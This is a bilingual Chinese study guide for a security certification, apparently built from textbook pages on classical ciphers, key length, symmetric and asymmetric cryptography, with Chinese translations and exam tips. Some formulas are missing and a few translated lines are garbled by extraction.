字母 A 的值设为0,字母 Z 的值设为25,表6.6展示了密文前两个单词的 加密操作。 C = ( ) P = (C ‑ K) mod 26 P + K mod 26 表 6.6 加密操作 操作组件x x x x x x x x x x x 明文 R I C H A R D W I L L Key W I T H M U C H I N T 数值明文 17 8 2 7 0 17 3 22 8 11 11 数字密钥 22 8 19 7 12 20 2 7 8 13 19 数字密文 13 16 21 14 12 11 5 3 16 24 4 密文 N Q V O M L F D Q Y E 当接收方收到密文时,他们使用相同的密钥,然后从密文中减去密钥,进行 模26运算,再将得到的明文转换回字母字符。 分组密码 分组密码对消息的“块”或分组进行操作,并同时对整个消息块应用加密算法。 置换密码是分组密码的示例。 挑战‑响应算法中使用的简单算法将整个单词的 字母顺序反转。 更复杂的列置换密码则对整个消息(或消息的一部分)进行操 作,并使用置换算法和一个秘密关键词对其进行加密。 大多数现代加密算法都 实现了某种类型的分组密码。

流密码 流密码一次处理消息(或数据流)中的一个字符或一位。 凯撒密码是流密码的 一个例子。 一次性密码本也是一种流密码,因为其算法独立地对明文的每个字 母进行操作。 流密码也可以作为分组密码的一种类型工作。 在这种操作中,存 在一个缓冲区,它会填满实时数据,然后作为一块进行加密并传输给接收方。 混淆与扩散

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 24 / PDF P395

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Cryptographic algorithms rely on two basic operations to obscure plaintext messages—confusion and diffusion. Confusion occurs when the relationship between the plaintext and the key is so complicated that an attacker can't merely continue altering the plaintext and analyzing the resulting ciphertext to determine the key. Diffusion occurs when a change in the plaintext results in multiple changes spread throughout the ciphertext. Consider, for example, a cryptographic algorithm that first performs a complex substitution and then uses transposition to rearrange the characters of the substituted ciphertext.

In this example, the substitution introduces confusion, and the transposition introduces diffusion. Modern Cryptography Modern cryptosystems use computationally complex algorithms and long cryptographic keys to meet the cryptographic goals of confidentiality, integrity, authentication, and nonrepudiation. This section covers the roles cryptographic keys play in the world of data security and examine three types of algorithms commonly used today: symmetric encryption algorithms, asymmetric encryption algorithms, and hashing algorithms.

Cryptographic Keys In the early days of cryptography, one of the predominant principles was “security through obscurity.” Some cryptographers thought the best way to keep an encryption algorithm secure was to hide the details of the algorithm from outsiders. Old cryptosystems required communicating parties to keep the algorithm used to encrypt and decrypt messages secret from third parties. Any disclosure of the algorithm could lead to compromise of the entire system by an adversary. Modern cryptosystems do not rely on the secrecy of their algorithms. In fact, the algorithms for most cryptographic systems are widely available for public review on the Internet.

Opening algorithms to public scrutiny actually improves their security. Widespread analysis of algorithms by the computer security community allows practitioners to discover and correct potential security vulnerabilities and ensure that the algorithms they use to protect their communications are as secure as possible. Instead of relying on secret algorithms, modern cryptosystems rely on the secrecy of one or more cryptographic keys used to personalize the algorithm for specific users or groups of users. Recall from the discussion of

中文直译 / 整理

加密算法依赖两种基本操作来隐藏明文消息——混淆和扩散。 混淆发生在明文 与密钥之间的关系如此复杂,以至于攻击者无法仅仅通过继续修改明文并分析 生成的密文来确定密钥。 扩散发生在明文的更改导致密文中多个位置发生改变 时。 例如,考虑一种首先执行复杂替换,然后使用置换重新排列替换后密文字 符的加密算法。 在这个例子中,替换引入了混淆,而置换引入了扩散。 现代密码学 现代密码系统使用计算复杂度高的算法和长密钥,以实现机密性、完整性、认 证和不可否认性性的密码学目标。 本节将探讨密码密钥在数据安全领域中的作用, 并分析三种当前常用算法:对称加密算法、非对称加密算法和哈希算法。 密码密钥 在密码学的早期,一个主要原则是“通过保密实现安全”。 一些密码学家认为, 保持加密算法安全的最佳方式是向外界隐藏算法的细节。 旧的密码系统要求通 信双方将用于加密和解密消息的算法细节对第三方保密。 一旦算法被泄露,整 个系统就可能被对手攻破。 现代密码系统不再依赖算法的机密性。 事实上,大多数密码系统的算法都可在 互联网上公开查阅。 将算法公开接受审查实际上能提升其安全性。

计算机安全 界对算法的广泛分析有助于从业者发现并修复潜在的安全漏洞,确保他们用于 保护通信的算法尽可能安全。 现代密码系统不再依赖秘密算法,而是依赖一个或多个用于个性化算法以适 应特定用户或用户组的加密密钥的机密性。 回想一下关于

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

认证:认证是验证“你是不是你声称的那个人”。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

数字签名、审计日志、交易记录和证书常支持不可否认性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
学习单元 25 / PDF P396

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

transposition ciphers that a keyword is used with the columnar transposition to guide the encryption and decryption efforts. The algorithm used to perform columnar transposition is well known—you just read the details of it in this book! However, columnar transposition can be used to securely communicate between parties as long as a keyword is chosen that would not be guessed by an outsider. As long as the security of this keyword is maintained, it doesn't matter that third parties know the details of the algorithm.

Although the public nature of the algorithm does not compromise the security of columnar transposition, the method does possess several inherent weaknesses that make it vulnerable to cryptanalysis. It is therefore an inadequate technology for use in modern secure communication. In the discussion of one-time pads earlier in this chapter, you learned that the main strength of the one-time pad algorithm is derived from the fact that it uses an extremely long random key. In fact, for that algorithm, the key is at least as long as the message itself.

Most modern cryptosystems do not use keys quite that long, but the length of the key is still an extremely important factor in determining the strength of the cryptosystem and the likelihood that the encryption will not be compromised through cryptanalytic techniques. Longer keys provide higher levels of security by increasing the size of the key space, rendering brute-force attacks more difficult. The rapid increase in computing power allows you to use increasingly long keys in your cryptographic efforts. However, this same computing power is also in the hands of cryptanalysts attempting to defeat the algorithms you use.

Therefore, it's essential that you outpace adversaries by using sufficiently long keys that will defeat contemporary cryptanalysis efforts. Additionally, if you want to improve the chance that your data will remain safe from cryptanalysis some time into the future, you must strive to use keys that will outpace the projected increase in cryptanalytic capability during the entire time period the data must be kept safe. For example, the advent of quantum computing may transform cryptography, rendering current cryptosystems insecure, as discussed earlier in this chapter.

When the Data Encryption Standard (DES) was created in 1975, a 56-bit key was considered sufficient to maintain the security of any data. However, there

中文直译 / 整理

换位密码的讨论,关键词用于列换位以指导加密和解密过程。 用于执行列换位 的算法是众所周知的——你刚刚在本书中阅读了其详细内容! 然而,只要选择 一个外界无法猜出的关键词,列换位就可以用于各方之间的安全通信。 只要该 关键词的机密性得到维护,第三方是否知道算法的细节就无关紧要。 尽管该算法的公开性不会危及列置换的安全性,但该方法仍存在若干 固有弱点,使其容易受到密码分析攻击。 因此,它不适合作为现代安全通 信的技术。 在本章前面关于一次性密码本的讨论中,您了解到一次性密码本算法的主要优 势源于其使用了极其长的随机密钥。 事实上,对于该算法,密钥长度至少与消 息本身一样长。 大多数现代密码系统并未使用如此长的密钥,但密钥长度仍然 是决定密码系统强度以及加密是否能通过密码分析技术被破解的关键因素。 更 长的密钥通过扩大密钥空间,使暴力破解更加困难,从而提供更高的安全级别。 计算能力的迅速提升使您能够在密码学应用中使用越来越长的密钥。 然而,同 样的计算能力也掌握在试图破解您所使用算法的密码分析者手中。 因此,您必 须通过使用足够长的密钥来超越对手,以抵御当代的密码分析努力。

此外,如 果您希望提高您的数据在未来一段时间内仍能免受密码分析威胁的可能性,就 必须努力使用能够超越整个数据保护期间密码分析能力预期增长的密钥。 例如, 正如本章前面所讨论的,量子计算的出现可能会彻底改变密码学,使当前的密 码系统变得不安全。 当数据加密标准(DES)于1975年创建时,56位密钥被认为足以保障任何数据的安 全。 然而,

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 26 / PDF P397

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

is now widespread agreement that the 56-bit DES algorithm is no longer secure because of advances in cryptanalysis techniques and supercomputing power. Modern cryptographic systems use at least a 128-bit key to protect data against prying eyes. Remember, the length of the key directly relates to the work function of the cryptosystem: the longer the key, the harder it is to break the cryptosystem.

In addition to choosing keys that are long and will remain secure for the expected length of time that the information will remain confidential, you should also implement some other key management practices: Always store secret keys securely and, if you must transmit them over a network, do so in a manner that protects them from unauthorized disclosure. Select keys using an approach that has as much randomness as possible, taking advantage of the entire key space. Destroy keys securely when they are no longer needed. Symmetric Key Algorithms Symmetric key algorithms rely on a “shared secret” encryption key that is distributed to all members who participate in the communications.

This key is used by all parties to both encrypt and decrypt messages, so the sender and the receiver both possess a copy of the shared key. The sender encrypts with the shared secret key, and the receiver decrypts with it. When large-sized keys are used, symmetric encryption is very difficult to break. It is primarily employed to perform bulk encryption and provides only for the security service of confidentiality. Symmetric key cryptography can also be called secret key cryptography and private key cryptography. Figure 6.3 illustrates the symmetric key encryption and decryption processes (with “C” representing a ciphertext message and “P” representing a plaintext message).

中文直译 / 整理

现在普遍认为,由于密码分析技术和超级计算能力的进步,56位DES算法已 不再安全。 现代密码系统至少使用128位密钥来保护数据免受窥探。 请记住, 密钥的长度直接关系到密码系统的运算复杂度:密钥越长,破解密码系统就越 困难。 除了选择长度足够且在信息保持机密的预期时间内仍能保证安全的密钥外, 您还应实施一些其他密钥管理实践: 始终安全地存储密钥,如果必须通过网络传输密钥,请以防止未经授权 泄露的方式进行传输。 选择ke y 尽可能具有随 机性的方法, g an app尽可能具有随机性的方法, 利用整个密钥空间。 当密钥不再需要时,安全地销毁它们。 对称密钥算法 对称密钥算法依赖于一个“共享密钥”,该密钥分发给所有参与通信的成员。 所有参与者都使用此密钥进行加密和解密消息,因此发送方和接收方都拥有共 享密钥的副本。 发送方使用共享密钥进行加密,接收方使用它进行解密。 当使 用大尺寸密钥时,对称加密非常难以破解。 它主要用于执行批量加密,仅提供 机密性安全服务。 对称密钥密码学也可称为秘密密钥密码学 和 私钥密码学。 图6.3展示了对称密钥加密和解密过程(其中“C”表示密文消息,“P”表示 明文消息)。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 27 / PDF P398

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

FIGURE 6.3 Symmetric key cryptography If you find yourself getting confused about the difference between symmetric and asymmetric cryptography, it may be helpful to remember that “same” is a synonym for “symmetric” and “different” is a synonym for asymmetric. In symmetric cryptography, the message is encrypted and decrypted with the same key, whereas in asymmetric cryptography, encryption and decryption use different (but related) keys. In some cases, symmetric cryptography may be used with temporary keys that exist only for a single session. In those cases, the secret key is known as an ephemeral key.

The most common example of this is the Transport Layer Security (TLS) protocol, which uses asymmetric cryptography to set up an encrypted channel and then switches to symmetric cryptography using an ephemeral key. You'll learn more about this topic in Chapter 7.

中文直译 / 整理

图 6.3 对称密钥加密 如果你对对称密码学和非对称密码学之间的区别感到困惑,可以记住: “相同”是“对称”的同义词,而“不同”是“非对称”的同义词。 在对 称密码学中,消息使用相同的密钥进行加密和解密; 而在非对称密码学中, 加密和解密使用不同的(但相关)密钥。 在某些情况下,对称加密可能会使用仅存在于单次会话中的临时密钥。 在这些 情况下,该秘密密钥被称为短暂密钥。 最常见的例子是传输层安全(TLS)协 议,它使用非对称加密来建立加密通道,然后切换到使用短暂密钥的对称加密。 您将在第7章中了解更多关于此主题的内容。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

非对称加密:非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

公钥加密、私钥签名是核心记忆点。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
学习单元 28 / PDF P399

DAD、过度保护、真实性、不可否认性与 AAA

CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

教材原文段落

The use of the term private key can be tricky because it is part of three different terms that have two different meanings. The term private key by itself always means the private key from the key pair of public key cryptography (aka asymmetric). However, both private key cryptography and shared private key refer to symmetric cryptography. The meaning of the word private is stretched to refer to two people sharing a secret that they keep confidential. (The true meaning of private is that only a single person has a secret that's kept confidential.) Be sure to keep these confusing terms straight in your studies.

Symmetric key cryptography has several weaknesses: Key distribution is a major problem. Parties must have a secure method of exchanging the secret key before establishing communications with a symmetric key protocol. If a secure electronic channel is not available, an offline key distribution method must often be used (that is, out-of-band exchange). Symmetric key cryptography does not implement nonrepudiation. Because any communicating party can encrypt and decrypt messages with the shared secret key, there is no way to prove where a given message originated. The algorithm is not scalable. It is extremely difficult for large groups to communicate using symmetric key cryptography.

Secure private communication between individuals in the group could be achieved only if each possible combination of users shared a secret key. Keys must be regenerated often. Each time a participant leaves the group, all secret keys known by that participant must be discarded. In automated encryption systems, keys may be regenerated based on the length of time that has passed, the amount of data exchanged, or the fact that a session goes idle or is terminated. The major strength of symmetric key cryptography is the great speed at which it can operate. Symmetric key encryption is very fast, often 1,000 to 10,000 times faster than asymmetric algorithms.

By nature of the mathematics involved, symmetric key cryptography also naturally lends itself to hardware

中文直译 / 整理

术语私钥的使用可能令人困惑,因为它属于三个不同术语,而这些术语 具有两种不同含义。 单独使用的术语私钥始终指公钥加密(即非对称加密) 密钥对中的私钥。 然而,私钥加密和共享私钥都指对称加密。 单词私有的的 含义被扩展,用于指两个人共享一个保密的秘密。 (私有的的真正含义是只 有一个人拥有一个保密的秘密。 )在学习过程中,请务必区分这些容易混淆 的术语。 对称密钥加密存在若干弱点: 密钥分发是一个主要问题。 在使用对称密钥协议建立通信之前,通信双方必须 具备安全的密钥交换方法。 如果无法提供安全的电子通道,则通常必须使用离线 密钥分发方法(即带外交换)。 对称密钥加密无法实现 不可否认性性。 由于任何通信方都可以使用共享密钥加密和 解密消息,因此无法证明某条消息的具体来源。 该算法不具备可扩展性。 对于大型群体而言,使用对称密钥加密进行通信极为 困难。 只有当组内每一对用户都共享一个密钥时,才能实现个体之间的安全私 密通信。 密钥必须经常重新生成。 每当有参与者离开组时,该参与者所知的所有密钥都 必须丢弃。 在自动加密系统中,密钥可根据经过的时间、交换的数据量或会话 处于空闲或被终止的事实重新生成。

对称密钥加密的主要优势在于其运行速度极快。 对称密钥加密非常迅速,通常 比非对称算法快1,000到10,000倍。 由于所涉及的数学特性,对称密钥加密天然 适合硬件

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“DAD、过度保护、真实性、不可否认性与 AAA”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

数字签名、审计日志、交易记录和证书常支持不可否认性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

公钥加密、私钥签名是核心记忆点。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
学习单元 29 / PDF P400

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

implementations, creating the opportunity for even higher-speed operations and bulk encryption tasks. The section “Symmetric Cryptography,” later in this chapter, provides a detailed look at the major secret key algorithms in use today. Asymmetric Key Algorithms Asymmetric key algorithms provide a solution to the weaknesses of symmetric key encryption. Public key algorithms are the most common example of asymmetric algorithms. In these systems, each user has two keys: a public key, which is shared with all users, and a private key, which is kept secret and known only to the user. But here's a twist: opposite and related keys must be used in tandem to encrypt and decrypt.

In other words, if the public key encrypts a message, then only the corresponding private key from the key pair can decrypt it, and vice versa. Figure 6.4 shows the algorithm used to encrypt and decrypt messages in a public key cryptosystem (with “C” representing a ciphertext message and “P” representing a plaintext message). Consider this example. If Alice wants to send a message to Bob using public key cryptography, she creates the message and then encrypts it using Bob's public key. The only possible way to decrypt this ciphertext is to use Bob's private key, and the only user with access to that key is Bob. Therefore, Alice can't even decrypt the message herself after she encrypts it.

If Bob wants to send a reply to Alice, he simply encrypts the message using Alice's public key, and then Alice reads the message by decrypting it with her own private key. FIGURE 6.4 Asymmetric key cryptography

中文直译 / 整理

实现,从而为更高性能的操作和批量加密任务创造了机会。 本章后面部分的“对称加密”一节将详细探讨当前使用的主要对称密钥算法。 非对称密钥算法 非对称密钥算法解决了对称密钥加密的弱点。 公钥算法是非对称算法最常见的 示例。 在这些系统中,每个用户拥有两个密钥:一个公钥,与所有用户共享; 以及一个私钥,保密且仅由用户本人知晓。 但这里有一个关键点:相反且相关 的密钥必须成对使用才能进行加密和解密。 换句话说,如果使用公钥加密一条 消息,则只有对应的私钥才能解密它,反之亦然。 图 6.4展示了在公钥密码系统中用于加密和解密消息的算法(其中“C”表示密 文消息,“P”表示明文消息)。 考虑以下示例。 如果爱丽丝想使用公钥密码 学向鲍勃发送一条消息,她首先创建消息,然后使用鲍勃的公钥对其进行加密。 解密此密文的唯一方法是使用鲍勃的私钥,而只有鲍勃才能访问该密钥。 因此, 爱丽丝在加密后甚至无法自己解密该消息。 如果鲍勃想给爱丽丝回复,他只需 使用爱丽丝的公钥加密消息,然后爱丽丝使用自己的私钥解密消息即可。 图 6.4 非对称密钥加密

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

非对称加密:非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

公钥加密、私钥签名是核心记忆点。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 30 / PDF P401

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Key Requirements In a class one of the authors of this book taught recently, a student wanted to see an illustration of the scalability issue associated with symmetric encryption algorithms. The fact that symmetric cryptosystems require each pair of potential communicators to have a shared private key makes the algorithm nonscalable. The total number of keys required to completely connect n parties using symmetric cryptography is given by the following formula: Number of Keys = Now, this might not sound so bad (and it's not for small systems), but consider the figures shown in Table 6.7.

Obviously, the larger the population, the less likely a symmetric cryptosystem will be suitable to meet its needs. TABLE 6.7 Symmetric and asymmetric key comparison Number of participants Number of symmetric keys required Number of asymmetric keys required 2 1 4 3 3 6 4 6 8 5 10 10 10 45 20 100 4,950 200 1,000 499,500 2,000 10,000 49,995,000 20,000 Asymmetric key algorithms also provide support for digital signature technology. Basically, if Bob wants to assure other users that a message with his name on it was actually sent by him, he first creates a message digest by

中文直译 / 整理

关键要求 在最近一位本书作者授课的班级中,一名学生希望了解对称加密算法所涉 及的可扩展性问题。 由于对称密码系统要求每对潜在通信方共享一个私钥, 因此该算法不具备可扩展性。 使用对称密码学完全连接n个参与方所需的密 钥总数由以下公式给出: 密钥数量 = 现在,这听起来可能并不那么糟糕(对于小型系统来说确实如此),但 请考虑表6.7中所示的数据。 显然,人口规模越大,对称密码系统越不适 合满足其需求。 表6.7 对称与非对称密钥比较 密钥数量 参与者 对称密钥数量 所需 非对称密钥数量 所需 2 1 4 3 3 6 4 6 8 5 10 10 10 45 20 100 4,950 200 1,000 499,500 2,000 10,000 49,995,000 20,000 非对称密钥算法还支持数字签名技术。 基本上,如果鲍勃希望向其他用户保证 带有他名字的消息确实是由他发送的,他首先通过

小白解释

